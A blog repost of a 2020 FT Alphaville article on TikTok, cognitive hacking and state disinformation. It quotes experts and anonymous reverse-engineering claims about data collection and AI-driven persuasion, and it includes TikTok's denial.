A Blog by Jonathan Low

 

Sep 8, 2020

Cognitive Hacking, Disinformation - and TikTok

Researchers have long believed social media - Facebook, in particular - were designed to implicitly influence users' behavior.

With TikTok, the intent is explicit and the outcomes are not limited to sales and marketing. JL

Izabella Kaminska reports in FT Alphaville:

Just 1% of a population (can) destabilise a democracy with a collapse in institutional trust. How hard is it to radicalise 1% with weaponised forms of persuasion? Easy. The biggest risk to cognitive security is now AI-driven influence hiding behind algorithms on social media platforms. Enter TikTok. This program develops predictive behavioral models expunged from data exposed by users’ digital footprints. Engineered to generate dopamine and cortisol, (it) has the capacity to create a user-specific profile of individuals’ fears and anxieties, learning which stimuli are trigger desired behaviors. The ultimate goal is “ideological remodelling” and “thought reform”.
Persuasion doesn’t need to influence the majority of the public to be effective. It’s enough to convince just one per cent of a population to destabilise a democracy pretty effectively with protests, rioting and a collapse in institutional trust. So the question that really needs asking is: how hard is it to radicalise one per cent of the public with modern, weaponised forms of persuasion?
The answer, experts say, is dangerously easy.
Those who specialise in the field of the persuasive arts told FT Alphaville that in 2020 new cognitive hacking technology means digitally-crafted propaganda has power like never before and the biggest risk to cognitive security is now AI-driven influence hiding behind “secret” algorithms on social media platforms.
For a moment, remove from the equation whether the social movements erupting across western democracies in 2020 are justified or not. The intention of this post is not to analyse the tenets of these movements, but rather to consider if it’s possible, whether by propaganda, social conditioning or amplified feedback loops, to radicalise well-intentioned people to turn against their own interests. In other words, can a good cause be intentionally weaponised against a population without their knowledge?
What we know is that the potential gain for a foreign adversary to purposefully radicalise elements of any social movement is potentially incalculable. The risk on their end, meanwhile, is trivial not least because every facet of the technology already exists.

Enter TikTok

TikTok is a private Chinese company with 800 million users that’s popular with adolescents and young kids. Until the recent controversies about its ownership, its leadership was said to be vulnerable, like many other Chinese platforms, to direct influence by the Chinese Communist party. 
This comes about because Chinese parent companies are obliged to follow CCP directives even if their foreign entities are separated, as these directives apply globally. China’s 2017 national intelligence law directs that “any organisation and citizen” shall support and co-operate " in national intelligence work”. Thus, if the Chinese government decided to boost the signal of any particular message on TikTok, the concern is it would be easy for it to do so by exploiting security vulnerabilities, as the White House recently highlighted in an executive order.
FT Alphaville spoke to Paul Dabrowa, an artificial intelligence and social media expert specialising in the operational underpinnings of persuasion and related psychology. Dabrowa is presently the co-founder of biome.ai, a company which uses artificial intelligence to develop treatments for disease using the human microbiome. However his academic background, both at Melbourne University and Harvard Kennedy School, saw him interviewing former Nazis and KGB operatives to develop a neuroscience model of how totalitarian propaganda works, and he has advised on these issues ever since. 
Dabrowa says one way the CCP could destabilise a foreign presidential campaign using TikTok, for example, would be to boost the signal of an otherwise small user to pull a political “prank” or to spread a specific piece of fake news.
This sort of stuff has happened before on online platforms. As Dabrowa noted to us, in 2013 unverified news spread in India about a young Hindu girl who complained to her family that she’d been verbally abused by a Muslim boy. In response, her brother and cousin reportedly went to pay the boy a visit and killed him. A gruesome video circulated on social media of two men being beaten to death, accompanied by a caption that identified them as Hindu and the mob as Muslim, which spurred real clashes between Hindu and Muslim communities. 13,000 Indian troops were called upon to put down the resulting violence.
Post facto analysis, however, showed the video was spread by social media “bot” accounts controlled by a political actor and that the video itself was of an entirely different incident. Not only was the video not of the men claimed in the caption, but the incident didn’t even take place in India. 
Dabrowa says to gain traction the operatives behind this attack required no technical skill whatsoever; just a psychosocial understanding of the right place and time to post it to achieve the desired effect.

So what are we really up against this time?

In February 2017, Russian Defense Minister Sergei Shoigu openly acknowledged the formation of an Information Army within the Russian military, noting
Information operations forces have been established that are expected to be a far more effective tool than all we used before for counterpropaganda purposes.
Dwarfing Russia’s effort in personnel and budget, however, are China’s propaganda operations. Unlike Russia’s efforts these are highly secret and hidden from organisational diagrams of the Chinese bureaucratic system. 
Those who have studied the system claim its tentacles spread throughout the bureaucratic establishment into virtually every medium concerned with the dissemination of information. The ultimate goal is “ideological remodelling” and “thought reform”. 
The department is headed by the media shy Wang Huning, said to be an instrumental figure in the rise of General Secretary, and “dictator for life”, Xi Jinping.
As experts from the Rand Corporation noted in a testimony to the US-China Economic and Security Review Commission in 2019 “official propaganda has relentlessly promoted Xi in a manner that many have compared to a “cult of personality. In addition, Xi’s anti-graft campaign has allowed him to crush potential rivals.”
The leadership cult is said to be operated under the principles of “Xi Jinping Thought” — where citizens are even encouraged to replace images of Jesus with the party leader
The Office of Foreign Propaganda more commonly known as 'Information Office of the State Council of the People's Republic of China', coordinates with a coalition of front groups including the “50 Cent Party” and “United Front” to conduct information warfare operations globally. 
The scandal surrounding Cambridge Analytica in 2016 focused on its harnessing of social media and personal data to influence elections in the same way PR agencies target advertising. State-based propaganda, however, can reach into every aspect of people’s lives by utilising all the tools available to totalitarian states; from military grade artificial intelligence to millions of full-time employees posting government messaging on social media.

Why TikTok is not like other platforms

Dabrowa claims TikTok is a fundamentally different app to other social media in the way it uses artificial intelligence to hook its users.
It has not just the capacity to harvest our data, but the artificial intelligence techniques at its disposal that the Chinese military has been developing to manipulate and shape the behaviour of its citizens.
Here’s what Dabrowa noted to us in correspondence:
This is a programme that develops predictive behavioural models expunged from the data exposed by users’ digital footprints online. This includes their computers, their smartphones, wearables, and just about any other data tracking devices. Online communities have attempted to reverse engineer some of TikTok’s processes have also highlighted the risks. Unlike Facebook which analyses your current friendship network, Tik Tok uses a behavioural profile powered by artificial intelligence to populate a user’s feed before friends are even added. It also predicts the type of friends you should have for your personality. 
Once outfitted with this information, the TikTok AI has the capacity to train users using similar methods that dog trainers use, ie deploying positive and negative feedback loops to encourage TikTok users to behave in certain ways. In practice the user would see a feed of people they are not necessarily linked to. Initially the videos would appear funny and generate positive emotions, at which point they would be directed to a propaganda video generated by the CCP, with the hope they would then share it. With repeated exposure the positive emotions will become subconsciously linked to the propaganda message in the same way a dog can be made to sit with food training. Over time children could be trained to associate positive emotions with political positions positive to the CCP or react negatively to positions negative to the CCP. 
The technology further has the capacity to create a user-specific profile of individuals’ fears and anxieties, learning which stimuli are likely to trigger desired responses and behaviours. It could then utilise addictive principles and implement stimuli that compel young adults to spend hours scrolling on their phone, purchase products, or join political movements. These algorithms are bespoke to the user and are powerful due to a century’s worth of research into shaping human behaviour.
We asked Dr. Robert Lustig, author of Hacking of the American Mind and a paediatric endocrinologist who has looked closely at how neuromarketing can influence addictive behaviours online, how plausible it was that users could be being groomed on apps like TikTok through addictive processes? His answer?
Absolutely. These apps are engineered to generate dopamine AND cortisol. If it were just dopamine, they would not be addictive. But they do both, in part due to peer pressure, which is particularly problematic in the teen age group.
I can't specifically tell you how TikTok does it (I have not investigated personally), but my understanding is that kids are supposed to generate their own content — but that it gets “liked”, just like Facebook. And that's where the addiction comes. 
And we've learned that anything that generates both dopamine and cortisol will turn the prefrontal cortex offline. In fact, a colleague in Paris and I are building a “robotic limbic system” to test this exact paradigm. So far it works! Which is not good news for kids.

Reverse engineering TikTok

While the algorithms TikTok uses are proprietary, much of the above has been gleaned from independent analysis of how the app functions on your phone. 
One anonymous redditor, for example, claimed in April to have reverse engineered some of the processes finding that: 
TikTok is a data collection service that is thinly-veiled as a social network. If there is an API to get information on you, your contacts, or your device . . . well, they're using it.
But also that:
They have several different protections in place to prevent you from reversing or debugging the app as well. App behaviour changes slightly if they know you're trying to figure out what they're doing. There's also a few snippets of code on the Android version that allows for the downloading of a remote zip file, unzipping it, and executing said binary. There is zero reason a mobile app would need this functionality legitimately.
The analysis also showed that much of the data collection, and its analytics, is disguised by encrypting requests with an algorithm that changes with every update — implying TikTok is going to some effort hide its track. They also say the app cannot be used if communications with their analytics host is blocked off.
US-based Penetrum Research offered a similar analysis, which you can check out here. It further noted the app is being used for monitoring and triggering location data (for location-based advertisements), before concluding:
After extensive research, we have found that not only is TikTok a massive security flaw waiting to happen, but the ties that they have to Chinese parties and Chinese ISP’s make it a very vulnerable source of data that still has more to be investigated.
Wall Street Journal investigation last week corroborated many of the allegations, including that the TikTok app collects handset-specific data and that ByteDance takes measures to conceal the data it captures. “TikTok wraps most of the user data it transmits in an extra layer of custom encryption,” they noted.
Ross Anderson, a professor of security engineering at the University of Cambridge told FT Alphaville that “lots of firms indulge in abuses that break the app stores' rules, and many of the offenders are Chinese.” But he also reminded us that all big platforms are predatory.
A TikTok spokesman rejected the claims telling Alphaville: “There's a lot of misinformation about TikTok out there. While we welcome scrutiny, we expect to be judged on the facts and the suggestion that TikTok would amplify sympathetic content about the CCP on behalf of the Chinese government is ludicrous.”
The spokesman added the company’s own security review found many allegations were inaccurate or reflected analysis of older versions of the app, and recommended the following alternative independent analysis. He also reminded that TikTok user data is stored in the US and Singapore and the app is not even available in China.
Nonetheless, it has been widely reported that TikTok has a remarkably similar behavioural profiling AI to sister app Douyin — which is also owned by ByteDance but can only be downloaded in China. Just like TikTok, Douyin too has the capacity to create a profile to influence behaviour through well-timed triggers. 
As Dabrowa explained to us, Douyin is compelled by Chinese Law to share any information the Chinese Government requests. The technology in this way has the capacity to serve the Communist regime to help feed data to China's Social Credit System, which seeks to assign citizens scores to engineer social behaviour. Data has already been used to ban more than 7m people deemed “untrustworthy” from boarding flights and nearly 3m from riding on high-speed trains.
It’s also worth noting then that in 2018 ByteDance’s founder Zhang Yiming pledged in a public apology to use his companies to “promote socialist core values”, adhere to the Chinese Communist party’s ideology, political thinking and deeds, “deepen co-operation” with state propaganda and “integrate the right values into technology and products”.
From Dabrowa:
Chinese authorities recently announced they would seek to freeze the assets of those deemed “dishonest people”. These intimate profiles are also used by the totalitarian regime to curate social media feeds to distract from undesirable political ideas such as “free speech” or the protests in Hong Kong. In some cases, the data the CCP collects is used to isolate and flag enemies of the people for arrest and shipment to concentration camps. 
Former Google CEO Eric Schmidt recently warned about Chinese AI stating: “Trust me, these Chinese people are good. They are going to use this technology for both commercial as well as military objectives with all sorts of implications,” and they are. Hence the panic. This AI is most likely already being used by the Chinese government to attempt to exert social and political control to preemptively shape how people behave on a scale never seen before in human history.
Similar concerns have been echoed by Reddit CEO Steve Huffman, who in February 2020 described the app as “fundamentally parasitic” and that he “could not bring myself to install an app like that on my phone”.
While ByteDance says it is trying to separate the Chinese version of the app from TikTok, Dabrowa says the risk continues to be that many backdoors will may remain undetected regardless. Given that TikTok’s target audience are children and young adults, Dabrowa concludes Microsoft purchasing TikTok and storing all user data in the United States may not be enough to keep users safe:
Data breaches are not the real concern and never have been. The real threat is the true agenda of the artificial intelligence that uses TikTok data for manipulation purposes.

0 comments:

Post a Comment